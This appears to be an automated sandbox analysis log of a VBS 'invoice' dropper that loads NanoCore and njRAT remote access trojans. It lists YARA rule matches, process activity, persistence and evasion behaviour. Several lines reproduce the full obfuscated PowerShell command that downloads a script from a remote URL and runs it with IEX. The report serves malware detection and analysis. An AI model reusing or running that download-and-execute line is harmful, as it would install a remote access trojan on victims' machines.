      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b7f99e.13.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.3b7156e.12.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.2849aac.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 20.2.aspnet_compiler.exe.286a330.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000001.00000002.652005586.000002534BC55000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000001.00000003.651067855.000002534BC5B000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.1171008020.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
      Source: 00000001.00000002.652059892.000002534D420000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detects the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs | Cryptographic APIs: 'CreateDecryptor'
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs | Cryptographic APIs: 'TransformFinalBlock'
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, L.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, L.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: classification engine | Classification label: mal100.troj.evad.winVBS@12/11@16/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210803
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_01
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{401b59fa-a7f2-4468-a03b-04e3bc489e18}
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Mutant created: \Sessions\1\BaseNamedObjects\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcg2nrvy.g5h.ps1
      Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs'
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbt_{& source: powershell.exe, 00000003.00000003.971380287.000001EA40435000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: aspnet_compiler.exe, 00000014.00000002.1178170237.0000000003C41000.00000004.00000001.sdmp

      Data Obfuscation:

      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("POWERsHELL $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF CO", "0")
      .NET source code contains potential unpacker
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs | .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, L.cs | .Net Code: Plugin System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Obfuscated command line found
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs | High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 20.2.aspnet_compiler.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs | High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

      Boot Survival:

      Creates an undocumented autostart registry key
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

      Hooking and other Techniques for Hiding and Protection:

      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe:Zone.Identifier read attributes | delete
      Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4694
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4559
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Window / User API: threadDelayed 2074
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Window / User API: threadDelayed 7003
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Window / User API: foregroundWindowGot 651
